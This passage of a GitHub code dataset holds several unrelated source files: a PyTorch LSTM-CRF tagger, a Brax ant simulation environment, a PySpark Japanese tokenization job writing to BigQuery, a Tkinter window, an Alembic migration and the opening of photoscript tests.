'mb')\n","repo_name":"b8raoult/analogues","sub_path":"lib/analogues/maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":14701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"41116563260","text":"#coding:utf-8\n\nimport sys\n\nimport torch\nfrom torch import nn\nimport torch.nn.functional as F\n\nfrom models.model import Model\nfrom modules.embedding.embedding import TokenEmbedding\nfrom modules.encoder.lstm_encoder import LstmEncoderLayer\nfrom modules.decoder.crf import CRF\n\nclass LstmCrfTagger(Model):\n def __init__(self, label_nums, vocab_size, input_dim,\n hidden_size, num_layers, use_crf=True,\n bidirection=True, batch_first=True, device=None,\n dropout=0.0, averge_batch_loss=True, **kwargs):\n \"\"\"\n ref: Neural Architectures for Named Entity Recognition\n 模型结构是word_embedding + bilstm + crf\n\n :params \n \"\"\"\n super(LstmCrfTagger, self).__init__(input_dim, vocab_size, **kwargs)\n\n self.encoder = LstmEncoderLayer(input_dim, hidden_size, num_layers, label_nums=label_nums+2,\n bidirectional=bidirection, batch_first=batch_first, dropout=dropout)\n\n self.averge_batch_loss = averge_batch_loss\n self.use_crf = use_crf\n if self.use_crf:\n self.decoder = CRF(label_nums, device)\n\n def forward(self, input, input_seq_length,\n mask=None, batch_label=None):\n\n embedding = self.embedding(input) #batch_size * seq_len * input_dim\n encoder_res = self.encoder(embedding, input_seq_length) #batch * seq_len * (hidden_dim*directions)\n batch_size = encoder_res.size(0)\n seq_len = encoder_res.size(1)\n\n if self.use_crf:\n _, tag_seq = self.decoder._viterbi_decode(encoder_res, mask)\n if batch_label is not None:\n total_loss = self.decoder.neg_log_likelihood_loss(encoder_res, mask, batch_label)\n \n else:\n outs = encoder_res.view(batch_size * seq_len, -1)\n _, 
tag_seq = torch.max(outs, 1)\n tag_seq = tag_seq.view(batch_size, seq_len)\n tag_seq = mask.long() * tag_seq\n if batch_label is not None:\n loss_function = nn.NLLLoss(ignore_index=0, size_average=False)#mask的token不对最后的loss产生影响, 固定mask的label id为0\n score = F.log_softmax(outs, 1)\n total_loss = loss_function(score, batch_label.view(batch_size * seq_len))\n\n if batch_label is not None:\n if self.averge_batch_loss:\n total_loss = total_loss / batch_size\n return {\"loss\":total_loss, \"logits\": tag_seq}\n else:\n return {\"logits\": tag_seq}\n\n def predict(self, input, input_seq_length, mask=None):\n input = input.unsqueeze(0)\n res = self.forward(input, input_seq_length, mask)\n return res[\"logits\"]\n\n\n \n\n\n\n\n\n\n","repo_name":"waterzxj/UNF","sub_path":"UNF/models/lstm_crf.py","file_name":"lstm_crf.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":70,"dataset":"github-code","pt":"76"} +{"seq_id":"9487707206","text":"## pylint:disable=g-multiple-import\n\"\"\"Creates an environment for the lowest level of a hierarchical framework\"\"\"\nimport sys\nimport inspect\nimport os\n\nfrom hct.envs.goal import Goal\nfrom hct.envs.tools import *\nfrom hct.training.configs import NetworkArchitecture, SMALL_TRANSFORMER_CONFIGS, DEFAULT_MLP_CONFIGS\nfrom hct.io import model, html\n\nfrom brax import base, generalized, math\nfrom brax.envs.base import Env, PipelineEnv, State\nfrom brax.io import mjcf\nfrom brax.kinematics import forward\n\nfrom etils import epath\n\nimport jax\nfrom jax import numpy as jp\n\nfrom typing import Optional, Literal, Tuple\n\nfrom absl import logging\n\n\nclass AntTest(PipelineEnv):\n\n\n def __init__(\n self,\n ctrl_cost_weight=0.5,\n use_contact_forces=False,\n contact_cost_weight=5e-4,\n healthy_reward=1.0,\n terminate_when_unhealthy=True,\n healthy_z_range=(0.2, 1.0),\n contact_force_range=(-1.0, 1.0),\n reset_noise_scale=0.1,\n exclude_current_positions_from_observation=True,\n backend='positional',\n architecture_configs=None,\n **kwargs,\n ):\n frame = inspect.currentframe()\n args, _, _, values = inspect.getargvalues(frame)\n self.parameters = {arg: values[arg] for arg in args}\n self.parameters.pop('self')\n \n path = epath.resource_path('hct') / f'envs/assets/ant.xml'\n sys = mjcf.load(path)\n\n n_frames = 5\n\n if backend in ['spring', 'positional']:\n sys = sys.replace(dt=0.005)\n n_frames = 10\n\n if backend == 'positional':\n sys = sys.replace(\n actuator=sys.actuator.replace(\n gear=200 * jp.ones_like(sys.actuator.gear)\n )\n )\n\n kwargs['n_frames'] = kwargs.get('n_frames', n_frames)\n\n super().__init__(sys=sys, backend=backend, **kwargs)\n\n self._ctrl_cost_weight = ctrl_cost_weight\n self._use_contact_forces = use_contact_forces\n self._contact_cost_weight = contact_cost_weight\n self._healthy_reward = healthy_reward\n self._terminate_when_unhealthy = terminate_when_unhealthy\n self._healthy_z_range = healthy_z_range\n self._contact_force_range = contact_force_range\n self._reset_noise_scale = reset_noise_scale\n self._exclude_current_positions_from_observation = (\n exclude_current_positions_from_observation\n )\n\n # Training attributes\n self.obs_mask = None\n self.non_actuator_nodes = None\n self.action_mask = None\n self.num_nodes = 9\n\n # Network architecture\n self.network_architecture = NetworkArchitecture.create(name='MLP', **DEFAULT_MLP_CONFIGS)\n self.max_actions_per_node = 1 if self.network_architecture.name=='Transformer' else 8\n\n self.action_repeat = 1\n self.horizon = 72\n 
self.episode_length = 1000\n        self.action_shape = (8, 1)\n\n\n        self.episode_length = 1000\n        if self._use_contact_forces:\n            raise NotImplementedError('use_contact_forces not implemented.')\n\n    def reset(self, rng) -> State:\n        \"\"\"Resets the environment to an initial state.\"\"\"\n\n\n        pipeline_state = self._sample_state(rng)\n        obs = self._get_obs(pipeline_state)\n\n        reward, done, zero = jp.zeros(3)\n\n        zeros = jp.zeros((self.action_size,))\n        metrics = {\n            'reward': zero\n        }\n\n        info = {\n            'rng': jax.random.split(rng)[0],\n            'min_ja': zeros,\n            'max_ja': zeros,\n            'min_jv': zeros,\n            'max_jv': zeros\n        }\n\n        return State(pipeline_state, obs, reward, done, metrics, info)\n\n    def step(self, state: State, action: jp.ndarray) -> State:\n        \"\"\"Run one timestep of the environment's dynamics.\"\"\"\n        pipeline_state0 = state.pipeline_state\n        pipeline_state = self.pipeline_step(pipeline_state0, action)\n\n        rng, rng1 = jax.random.split(state.info['rng'])\n        prev_min_ja, prev_max_ja = state.info['min_ja'], state.info['max_ja']\n        prev_min_jv, prev_max_jv = state.info['min_jv'], state.info['max_jv']\n\n        is_healthy = jp.where(rotate(jp.array([0, 0, 1]), pipeline_state.x.rot[0])[-1] > 0, x=1.0, y=0.0)\n\n        if self._terminate_when_unhealthy:\n            healthy_reward = self._healthy_reward\n        else:\n            healthy_reward = self._healthy_reward * is_healthy\n\n        ja = state.pipeline_state.q[7:]\n        jv = state.pipeline_state.qd[6:]\n\n        min_ja = jp.where(ja<prev_min_ja, x=ja, y=prev_min_ja)\n        max_ja = jp.where(ja>prev_max_ja, x=ja, y=prev_max_ja)\n        min_jv = jp.where(jv<prev_min_jv, x=jv, y=prev_min_jv)\n        max_jv = jp.where(jv>prev_max_jv, x=jv, y=prev_max_jv)\n\n        abs_cur = jp.abs(min_ja) + jp.abs(max_ja) + jp.abs(min_jv) + jp.abs(max_jv)\n        abs_prev = jp.abs(prev_min_ja) + jp.abs(prev_max_ja) + jp.abs(prev_min_jv) + jp.abs(prev_max_jv)\n\n        diff = abs_cur - abs_prev\n        reward = jp.sum(jp.square(jp.where(diff > 0, abs_cur, 0)))\n\n        done = 1.0 - is_healthy if self._terminate_when_unhealthy else 0.0\n\n        pipeline_state = jax.lax.cond(done, self._sample_state, lambda x: pipeline_state, rng1)\n        obs = self._get_obs(pipeline_state)\n\n        state.metrics.update(\n            reward=reward\n        )\n        state.info.update(\n            rng=rng,\n            min_ja=min_ja,\n            max_ja=max_ja,\n            min_jv=min_jv,\n            max_jv=max_jv)\n        \n        return state.replace(\n            pipeline_state=pipeline_state, obs=obs, reward=reward, done=done\n        )\n\n    def _get_obs(self, pipeline_state: base.State) -> jp.ndarray:\n        \"\"\"Observe ant body position and velocities.\"\"\"\n        qpos = pipeline_state.q\n        qvel = pipeline_state.qd\n\n        if self._exclude_current_positions_from_observation:\n            qpos = pipeline_state.q[2:]\n\n        return jp.concatenate([qpos] + [qvel])\n    \n    def _sample_state(self, rng: jp.ndarray):\n        \"\"\"\n        Samples normalised goal and outputs a goal state \n        \n        Goal is restricted to ensure a valid state, and acheive a range of positions\n        that are expected to be achieved by the optimal policy. 
Restictions on\n Z position of all links\n Root rotation\n Number of feet in contact with ground:\n Randomly sample an ordered subset of end effector IDs\n Ensure that these end effectors are in contact with ground\n\n Args:\n rng: jp.ndarray\n\n Returns:\n goal: Goal\n \"\"\"\n\n rng, rng1, rng2, rng3, rng4 = jax.random.split(rng, 5)\n\n low, hi = -self._reset_noise_scale, self._reset_noise_scale\n\n q = self.sys.init_q + jax.random.uniform(\n rng3, (self.sys.q_size(),), minval=low, maxval=hi\n )\n\n qd = hi * jax.random.normal(rng4, (self.sys.qd_size(),))\n\n return self.pipeline_init(q, qd)\n\n def move_limbs(self, limb_ids, actuator_force):\n return jp.zeros((self.action_size,)).at[jp.array(limb_ids)].set(actuator_force)\n \n \n def test_rollout(self):\n \n path = epath.resource_path('hct') / f'envs/assets/ant_test.xml'\n self.sys = mjcf.load(path)\n\n def reset(limit_id: int) -> State:\n \"\"\"Resets the environment to an initial state.\"\"\"\n\n joint_angles = jax.lax.select(limit_id==0, jp.array(self.sys.dof.limit[0]), jp.array(self.sys.dof.limit[1]))\n q = jp.concatenate([jp.array([0,0,0,1,0,0,0]), joint_angles[6:]])\n qd = jp.zeros((self.sys.qd_size(),))\n \n if limit_id is None:\n q = self.sys.init_q\n\n pipeline_state = self.pipeline_init(q, qd)\n obs = self._get_obs(pipeline_state)\n\n reward, done, zero = jp.zeros(3)\n metrics = {\n 'reward_forward': zero,\n 'reward_survive': zero,\n 'reward_ctrl': zero,\n 'reward_contact': zero,\n 'x_position': zero,\n 'y_position': zero,\n 'distance_from_origin': zero,\n 'x_velocity': zero,\n 'y_velocity': zero,\n 'forward_reward': zero,\n }\n return State(pipeline_state, obs, reward, done, metrics)\n\n def step(state: State, action: jp.ndarray) -> State:\n \"\"\"Run one timestep of the environment's dynamics.\"\"\"\n pipeline_state0 = state.pipeline_state\n pipeline_state = self.pipeline_step(pipeline_state0, action)\n\n velocity = (pipeline_state.x.pos[0] - pipeline_state0.x.pos[0]) / self.dt\n forward_reward = velocity[0]\n\n min_z, max_z = self._healthy_z_range\n is_healthy = jp.where(pipeline_state.x.pos[0, 2] < min_z, x=0.0, y=1.0)\n is_healthy = jp.where(\n pipeline_state.x.pos[0, 2] > max_z, x=0.0, y=is_healthy\n )\n if self._terminate_when_unhealthy:\n healthy_reward = self._healthy_reward\n else:\n healthy_reward = self._healthy_reward * is_healthy\n ctrl_cost = self._ctrl_cost_weight * jp.sum(jp.square(action))\n contact_cost = 0.0\n\n obs = self._get_obs(pipeline_state)\n reward = forward_reward + healthy_reward - ctrl_cost - contact_cost\n done = 1.0 - is_healthy if self._terminate_when_unhealthy else 0.0\n state.metrics.update(\n reward_forward=forward_reward,\n reward_survive=healthy_reward,\n reward_ctrl=-ctrl_cost,\n reward_contact=-contact_cost,\n x_position=pipeline_state.x.pos[0, 0],\n y_position=pipeline_state.x.pos[0, 1],\n distance_from_origin=math.safe_norm(pipeline_state.x.pos[0]),\n x_velocity=velocity[0],\n y_velocity=velocity[1],\n forward_reward=forward_reward,\n )\n return state.replace(\n pipeline_state=pipeline_state, obs=obs, reward=reward, done=done\n )\n\n\n filename = '/nfs/nhome/live/aoomerjee/MSc-Thesis/hct/envs/ranges/test_rollout'\n\n if os.path.isfile(filename):\n return model.load(filename)\n\n jit_env_reset = jax.jit(reset)\n jit_env_step = jax.jit(step)\n jit_move_limbs = jax.jit(self.move_limbs)\n\n state = jit_env_reset(limit_id=None)\n rollout = [state.pipeline_state]\n\n limb_movements = (\n (list(range(1,8,2)), -1),\n (list(range(1,8,2)), 1),\n (list(range(1,8,2)), -1),\n (list(range(0,8,2)), 
-1),\n (list(range(0,8,2)), 1),\n (list(range(0,8,2)), -1),\n (list(range(1,8,2)), 1),\n (list(range(1,8,2)), -1),\n (list(range(1,8,2)), 1),\n (list(range(0,8,2)), 1),\n (list(range(0,8,2)), -1),\n (list(range(0,8,2)), 1),\n (list(range(1,8,2)), -1),\n (list(range(1,8,2)), 1),\n (list(range(1,8,2)), -1),\n )\n\n for args in limb_movements:\n for _ in range(30):\n act = jit_move_limbs(*args)\n state = jit_env_step(state, act)\n rollout.append(state.pipeline_state)\n\n output = (rollout, html.render(self.sys.replace(dt=self.dt), rollout))\n\n model.save(filename, output)\n path = epath.resource_path('hct') / f'envs/assets/ant.xml'\n self.sys = mjcf.load(path)\n\n return output\n\n\n\n\n\n''' \n def _limb_dist(\n self, \n state1: base.State, \n state2: base.State, \n limb_id: int, \n frame: Literal['world', 'relative']):\n \"\"\"\n Computes distance d(s,g) between state and goal in world frame, \n accounting for quaternion double cover.\n\n dist(s,g) = ||s-g||\n \"\"\"\n if frame == 'world':\n state1_x = state1.x.take(limb_id)\n state1_xd = state1.xd.take(limb_id) \n state2_x = state2.x.take(limb_id)\n state2_xd = state2.xd.take(limb_id)\n else:\n state1_x = world_to_relative(state1.x.take(limb_id), self.sys)\n state1_xd = world_to_relative(state1.xd.take(limb_id), self.sys)\n state2_x = world_to_relative(state2.x.take(limb_id), self.sys)\n state2_xd = world_to_relative(state2.xd.take(limb_id), self.sys)\n\n rpos = state1_x.pos - state2_x.pos\n rrot = dist_quat(state1_x.rot, state2_x.rot)\n rx = concatenate_attrs(base.Transform(rpos, rrot))\n rxd = concatenate_attrs(state1_xd.__sub__(state2_xd))\n x_dist = safe_norm(rx) \n xd_dist = safe_norm(rxd)\n return x_dist, xd_dist\n'''\n\n\n'''\n def get_limb_x_dist(self, x0: base.Transform, x1: base.Transform, limb_id):\n x0 = x0.take(limb_id)\n x1 = x1.take(limb_id)\n rpos = x0.pos - x1.pos\n rrot = dist_quat(x0.rot, x1.rot)\n rx = concatenate_attrs(base.Transform(rpos, rrot))\n x_dist = safe_norm(rx) \n return x_dist\n\n def get_limb_xd_dist(self, xd0: base.Transform, xd1: base.Transform, limb_id):\n xd0 = xd0.take(limb_id)\n xd1 = xd1.take(limb_id)\n rxd = concatenate_attrs(xd0.__sub__(xd1)) \n return safe_norm(rxd)\n \n\n def get_limb_ranges(self):\n\n test_rollout, html = self.test_rollout()\n \n quaternion_to_spherical_vmap = jax.vmap(quaternion_to_spherical, in_axes=0)\n jit_env_reset = jax.jit(self.reset)\n jit_env_step = jax.jit(self.step)\n jit_move_limbs = jax.jit(self.move_limbs)\n\n q0 = jp.concatenate([jp.array([0,0,0,1,0,0,0]), jp.array(self.sys.dof.limit[0])[6:]])\n q1 = jp.concatenate([jp.array([0,0,0,1,0,0,0]), jp.array(self.sys.dof.limit[1])[6:]])\n\n qd0 = jp.zeros((self.sys.qd_size(),)) \n\n x0 = world_to_relative(forward(self.sys, q0, qd0)[0], self.sys)\n x1= world_to_relative(forward(self.sys, q1, qd0)[0], self.sys)\n\n xd0 = base.Motion.zero(shape = (self.sys.num_links(),))\n xd0 = world_to_relative(xd0, self.sys)\n\n upper_leg_dists = {}\n lower_leg_dists = {}\n\n upper_leg_dists['max_x_dist'] = self.get_limb_x_dist(x0, x1, 1)\n lower_leg_dists['max_x_dist'] = self.get_limb_x_dist(x0, x1, 2)\n\n rollout = []\n rollout_rel_x = []\n rollout_rel_xd = []\n\n ''' \n'''\nfor ranges in (upper_leg_dists, lower_leg_dists):\n\n if ranges == upper_leg_dists:\n limb_id = 3\n else:\n limb_id = 4\n\n ranges['max_xd_dist'] = 0'''\n'''\n for limit_id in (0,1):\n\n for actuator_force in (-1,1,-1,1):\n\n state = jit_env_reset(limit_id=limit_id)\n\n for _ in range(30):\n\n rollout.append(state.pipeline_state)\n\n pipeline_state_rel_x = 
world_to_relative(state.pipeline_state.x, self.sys)\n pipeline_state_rel_xd = world_to_relative(state.pipeline_state.xd, self.sys)\n rollout_rel_x.append(pipeline_state_rel_x)\n rollout_rel_xd.append(pipeline_state_rel_xd)\n\n xd_dist = self.get_limb_xd_dist(xd0, pipeline_state_rel_xd , limb_id)\n if xd_dist > ranges['max_xd_dist']:\n ranges['max_xd_dist'] = xd_dist\n\n act = jit_move_limbs(limb_id=limb_id, actuator_force=actuator_force)\n state = jit_env_step(state, act)\n\n rollout_rel_pos = jp.stack([x.pos for x in rollout_rel_x])\n rollout_rel_rot = jp.stack([quaternion_to_spherical_vmap(x.rot) for x in rollout_rel_x])\n rollout_rel_vel = jp.stack([xd.vel for xd in rollout_rel_xd])\n rollout_rel_ang = jp.stack([xd.ang for xd in rollout_rel_xd])\n\n pos_ranges = jp.min(rollout_rel_pos, axis=0), jp.max(rollout_rel_pos, axis=0)\n rot_ranges = jp.min(rollout_rel_rot, axis=0), jp.max(rollout_rel_rot, axis=0)\n vel_ranges = jp.min(rollout_rel_vel, axis=0), jp.max(rollout_rel_vel, axis=0)\n ang_ranges = jp.min(rollout_rel_ang, axis=0), jp.max(rollout_rel_ang, axis=0)\n\n return_dict = {\n 'upper_leg_dists': upper_leg_dists, \n 'lower_leg_dists': lower_leg_dists,\n 'pos_ranges': pos_ranges, \n 'rot_ranges': rot_ranges, \n 'vel_ranges': vel_ranges, \n 'ang_ranges': ang_ranges, \n 'rollout': rollout,\n 'rollout_rel_x': rollout_rel_x,\n 'rollout_rel_xd': rollout_rel_xd,\n 'html': html.render(self.sys.replace(dt=self.dt), rollout)\n }\n return return_dict'''\n\n\n\n\n","repo_name":"adnanoomerjee/MSc-Thesis","sub_path":"hct/envs/ant_test.py","file_name":"ant_test.py","file_ext":"py","file_size_in_byte":15057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"44732259446","text":"from pyspark.sql import SparkSession\nfrom pyspark.sql import types as T, functions as F\nfrom google.cloud import storage\nfrom datetime import datetime as dt\nimport MeCab\nimport copy\nimport jaconv\nimport pandas as pd\n\n\n\"\"\"\n=====================\nUDF and utilities\n=====================\n\"\"\"\n\n\"\"\"\nTokenizer UDF\n\"\"\"\nclass JapaneseTokenizer(object):\n def __init__(self):\n self.mecab = MeCab.Tagger(\n '-d /usr/lib/x86_64-linux-gnu/mecab/dic/mecab-ipadic-neologd -u \"/usr/lib/x86_64-linux-gnu/mecab/dic/user/neologd_60_noskip.dic\"'\n )\n self.mecab.parseToNode('')\n \n def split(self, text):\n node = self.mecab.parseToNode(text)\n words = []\n while node:\n if node.surface:\n words.append(node.surface.decode(\"UTF-8\"))\n node = node.next\n return words\n\ndef tokenize(text):\n tokenizer = JapaneseTokenizer()\n return tokenizer.split(text)\n\ndef tokenize_and_create_rdd(text):\n return ','.join(tokenize(text.encode(\"UTF-8\")))\n\ntokenize_udf = F.udf(tokenize_and_create_rdd, T.StringType())\n\n\"\"\"\nstr_yyyymmdd_to_date UDF\n\"\"\"\ndef str_yyyymmdd_to_date(tdate):\n return '{0}-{1}-{2}'.format(tdate[0:4], tdate[4:6], tdate[6:8])\n\nstr_yyyymmdd_to_date_udf = F.udf(str_yyyymmdd_to_date, T.StringType())\n\n\"\"\"\nget_pre_id_and_post_id UDF\n\"\"\"\ndef get_pre_id_and_post_id(idx_id):\n return idx_id.split(\"_\")\n\nget_pre_id_and_post_id_udf = F.udf(get_pre_id_and_post_id, T.ArrayType(T.StringType()))\n\n\n\"\"\"\nget_latest_daily_file_name\n\"\"\"\ndef get_latest_daily_file_name(bucket_name, file_type, tdate, delimiter=None):\n storage_client = storage.Client()\n\n prefixCondition = file_type + \"/\" + file_type + \"_\" + tdate + \"_\"\n blobs = storage_client.list_blobs(\n bucket_name, prefix=prefixCondition, delimiter=delimiter\n )\n\n 
filename_list = {}\n for blob in blobs:\n file_date_str = blob.name.split('/')[-1].split('_')[-1].split('.')[0]\n tdatetime = dt.strptime(file_date_str, '%Y%m%d%H%M%S')\n filename_list[blob.name] = tdatetime\n \n if any(filename_list):\n latest_file_name = max(filename_list, key=filename_list.get)\n print(latest_file_name)\n return latest_file_name\n else:\n raise Exception(\"target file '{}' on '{}' is not exist ...\".format(file_type, tdate))\n\n\n\"\"\"\n=====================\nvars\n=====================\n\"\"\"\ntarget_date = \"20200929\"\ntarget_file_gcs_name = \"{target_file_gcs_name}\"\ntarget_file_type = \"{target_file_type}\"\n\nbigquery_dataset = \"{bigquery_dataset}\"\nbigquery_save_table = \"{bigquery_save_table}\"\n\ntry:\n login = pd.read_csv(r'login.txt', header=None)\n user = login[0][0]\n password = login[0][1]\n print('User information is ready!')\nexcept:\n print('Login information is not available!!')\n\nhost = '##.##.##.##'\ndb_name = 'db_name'\n\ncloud_sql_options_base = {\n \"url\": \"jdbc:mysql://{}:5432/{}\".format(host, db_name),\n \"driver\":\"com.mysql.jdbc.Driver\",\n \"user\":user,\n \"password\":password\n}\n\n\n\"\"\"\n=====================\nmain\n=====================\n\"\"\"\n\n\"\"\"\n初期化\n\"\"\"\nspark = SparkSession\\\n .builder\\\n .master('yarn')\\\n .appName('morph-prototype')\\\n .getOrCreate()\n\ntemp_bucket = \"hopstar-dev-dataproc\"\nspark.conf.set('temporaryGcsBucket', temp_bucket)\n\n\n\"\"\"\nCreate dataframe from tsv\n\"\"\"\ntarget_file_name = get_latest_daily_file_name(target_file_gcs_name, target_file_type, target_date)\n\ntsv_gcs_path='gs://{0}/{1}'.format(target_file_gcs_name, target_file_name)\ndf_tsv = spark.read.csv(tsv_gcs_path, sep=r'\\t', header=True)\n\n\n\"\"\"\nCreate dictionary dataframe from CloudSQL\n\"\"\"\ncloud_sql_options = copy.copy(cloud_sql_options_base)\n\n\ncloud_sql_options[\"dbtable\"] = \"post_keywords\"\ndf_post_keywords_base = spark.read.format(\"jdbc\").options(**cloud_sql_options).load()\n\n\"\"\"\nCreate Keyword\n\"\"\"\n\ndf_post_keywords = df_post_keywords_base.filter(df_post_keywords_base.status == 1).select(\"post_id\", \"keyword\")\n\npost_dics_dics = {}\n\npost_rows = df_post_keywords.collect()\npost_ids = [str(row[0]) for row in post_rows ]\npost_ids = list(set(post_ids))\n\nfor post_id in post_ids:\n post_dics_dics[post_id] = []\n \nfor row in post_rows:\n id = str(row[0])\n keyword = str(jaconv.h2z(row[1]).encode(\"UTF-8\").lower())\n post_dics_dics[id].append(keyword)\n\n\n\"\"\"\ncheck_having_the_post_dics_keyword\n\"\"\"\ndef check_having_the_post_dics_keyword(post_id, wakati):\n if post_id in post_dics_dics:\n wakati_array = wakati.split(\",\")\n hit_words = [hit_word for hit_word in wakati_array if jaconv.h2z(hit_word).encode(\"UTF-8\").lower() in post_dics_dics[post_id]]\n if any(hit_words):\n return \",\".join(list(set(hit_words)))\n else:\n return None\n else:\n return None\n\ncheck_having_the_post_dics_keyword_udf = F.udf(check_having_the_post_dics_keyword, T.StringType())\n\n\n\n\n\"\"\"\nCheck\n\"\"\"\ndf_check_base = df_tsv.withColumn(\"wakati\", tokenize_udf(F.col(\"text\")))\n\n# df_check_base = df_tsv\\\n# .limit(500)\\\n# .withColumn(\"wakati\", tokenize_udf(F.col(\"text\")))\n\ndf_check = df_check_base\\\n .withColumn(\"ids_array\", get_pre_id_and_post_id_udf(F.col(\"idx_id\")))\\\n .withColumn(\"pre_id\", F.col(\"ids_array\")[0])\\\n .withColumn(\"post_id\", F.col(\"ids_array\")[1])\\\n .withColumn(\"match_post_dics_keywords\", 
check_having_the_post_dics_keyword_udf(F.col(\"post_id\"), F.col(\"wakati\")))\\\n .drop(\"ids_array\")\\\n .drop(\"pre_id\")\\\n .drop(\"post_id\")\n\n\n\"\"\"\nSave to BigQuery\n\"\"\"\ndf_check_converted = df_check\\\n .withColumn(\"created_at\", df_check.created_at.cast(T.TimestampType()))\\\n .withColumn(\"tdate\", F.lit(str_yyyymmdd_to_date(target_date)))\\\n .withColumn(\"tdate\", F.lit(F.col(\"tdate\").cast(\"date\")))\n\ndf_check_converted\\\n .write\\\n .format('bigquery')\\\n .mode('append')\\\n .option('table', '{0}.{1}'.format(bigquery_dataset, bigquery_save_table))\\\n .option('partitionType', 'DAY')\\\n .option('partitionField', 'tdate')\\\n .save()\n","repo_name":"yukia3e/dataproc-morph-bigquery","sub_path":"DataprocMorphBigquery.py","file_name":"DataprocMorphBigquery.py","file_ext":"py","file_size_in_byte":5917,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"71244980087","text":"import sqlite3\r\nfrom Tkinter import *\r\nimport os\r\n\r\n\r\ncreds = 'tempadmin.temp'\r\n\r\n\r\ndef getAdminUsername():\r\n print(\"getAdminUsername CALLED\")\r\n with open(creds) as f:\r\n data = f.readlines() \r\n u = data[1].rstrip()\r\n return u\r\n\r\n\r\n#main window\r\nroot=Tk()\r\nroot.title(\"GODSEYE\\\\\"+getAdminUsername())\r\n#root.overrideredirect(True)\r\nroot.geometry(\"{0}x{1}+0+0\".format(root.winfo_screenwidth(), root.winfo_screenheight()))\r\nroot.iconbitmap(r'C:\\Users\\parek\\Desktop\\GODSEYE\\GODSEYE openCV\\GUI\\icon1.ico')\r\nroot.configure(background=\"#033798\")\r\n\r\n#title\r\ntitle=Label(root,text=\"GODSEYE\",bg=\"#033798\",fg=\"#FFFFFF\")\r\ntitle.config(font=(\"Helvetica 50 bold\"))\r\ntitle.place(x=50, y=40)\r\n\r\n#secondary title\r\npageName=Label(root,text=\"Manage User Database\",bg=\"#033798\",fg=\"#A3B4D7\")\r\npageName.config(font=(\"Helvetica 25 bold\"))\r\npageName.place(x=900, y=70)\r\n\r\nroot.mainloop()\r\n","repo_name":"jayparekhjp/openCV-Facial-Recognition","sub_path":"Face Recognition SQLite - GPU/GUImanageUserDatabase.py","file_name":"GUImanageUserDatabase.py","file_ext":"py","file_size_in_byte":892,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"72839190326","text":"\"\"\"Add record unique constraint\n\nRevision ID: fc7aef9b17f8\nRevises: 4effed76d1e2\nCreate Date: 2021-02-24 17:05:51.046173\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = \"fc7aef9b17f8\"\ndown_revision = \"4effed76d1e2\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_unique_constraint(\n None, \"record\", [\"ensemble_id\", \"realization_index\", \"name\"]\n )\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(None, \"record\", type_=\"unique\")\n # ### end Alembic commands ###\n","repo_name":"equinor/ert-storage","sub_path":"src/ert_storage/_alembic/alembic/versions/fc7aef9b17f8_add_record_unique_constraint.py","file_name":"fc7aef9b17f8_add_record_unique_constraint.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"26307599400","text":"\"\"\" Tests which require user interaction to run \"\"\"\n\nimport os\nimport pathlib\nimport tempfile\n\nimport pytest\nfrom applescript import AppleScript\n\nimport photoscript\nfrom tests.conftest import copy_photos_library, photoslib, suspend_capture\nfrom tests.photoscript_config_data import (\n ALBUM_1_NAME,\n ALBUM_1_PHOTO_EXPORT_FILENAMES,\n ALBUM_1_UUID,\n ALBUM_NAMES_ALL,\n ALBUM_NAMES_TOP,\n FOLDER_NAME,\n FOLDER_NAMES_ALL,\n FOLDER_NAMES_TOP,\n FOLDER_UUID,\n IMPORT_PATHS,\n IMPORT_PHOTOS,\n NUM_PHOTOS,\n PHOTO_EXPORT_2_FILENAMES,\n PHOTO_EXPORT_2_FILENAMES_ORIGINAL,\n PHOTO_EXPORT_FILENAME,\n PHOTO_EXPORT_UUID,\n PHOTO_FAVORITES_SET_UUID,\n PHOTO_FAVORITES_UNSET_UUID,\n PHOTOS_DICT,\n PHOTOS_FAVORITES,\n PHOTOS_FAVORITES_SET,\n PHOTOS_FILENAMES,\n PHOTOS_PLANTS,\n PHOTOS_UUID,\n PHOTOS_UUID_FILENAMES,\n SELECTION_UUIDS,\n TEST_LIBRARY,\n TEST_LIBRARY_OPEN,\n)\n\n########## Interactive tests run first ##########\n\n\ndef test_photoslibrary_open(photoslib, suspend_capture):\n test_library = copy_photos_library(photos_library=TEST_LIBRARY_OPEN, open=False)\n prompt = \"Click Switch in Photos after the drop down sheet appears.\"\n os.system(f'say \"{prompt}\"')\n with suspend_capture:\n photoslib.open(test_library)\n prompt = (\n \"Press 'y' if Photos Library contains a single image \"\n \"of a kettlebell, otherwise press 'n' \"\n )\n os.system(f'say \"{prompt}\"')\n answer = input(f\"\\n{prompt}\")\n assert answer.lower() == \"y\"\n # re-copy main test library\n test_library = copy_photos_library(photos_library=TEST_LIBRARY)\n\n\ndef test_photoslibrary_import_photos_dup_check(photoslib):\n \"\"\"Attempt to import a duplicate photo with skip_duplicate_check = False\n This will cause Photos to display dialog box prompting user what to do\"\"\"\n cwd = os.getcwd()\n photo_paths = [str(pathlib.Path(cwd) / path) for path in IMPORT_PATHS]\n photoslib.import_photos(photo_paths)\n photos = list(photoslib.photos())\n assert len(photos) == NUM_PHOTOS + 1\n\n # Photos will block waiting for user to act on dialog box\n prompt = \"Click Don't Import in Photos after the drop down sheet appears.\"\n os.system(f'say \"{prompt}\"')\n photos = photoslib.import_photos(photo_paths)\n assert not photos\n photos = list(photoslib.photos())\n assert len(photos) == NUM_PHOTOS + 1\n\n\ndef test_photoslibrary_selection(photoslib, suspend_capture):\n \"\"\"Test selection. 
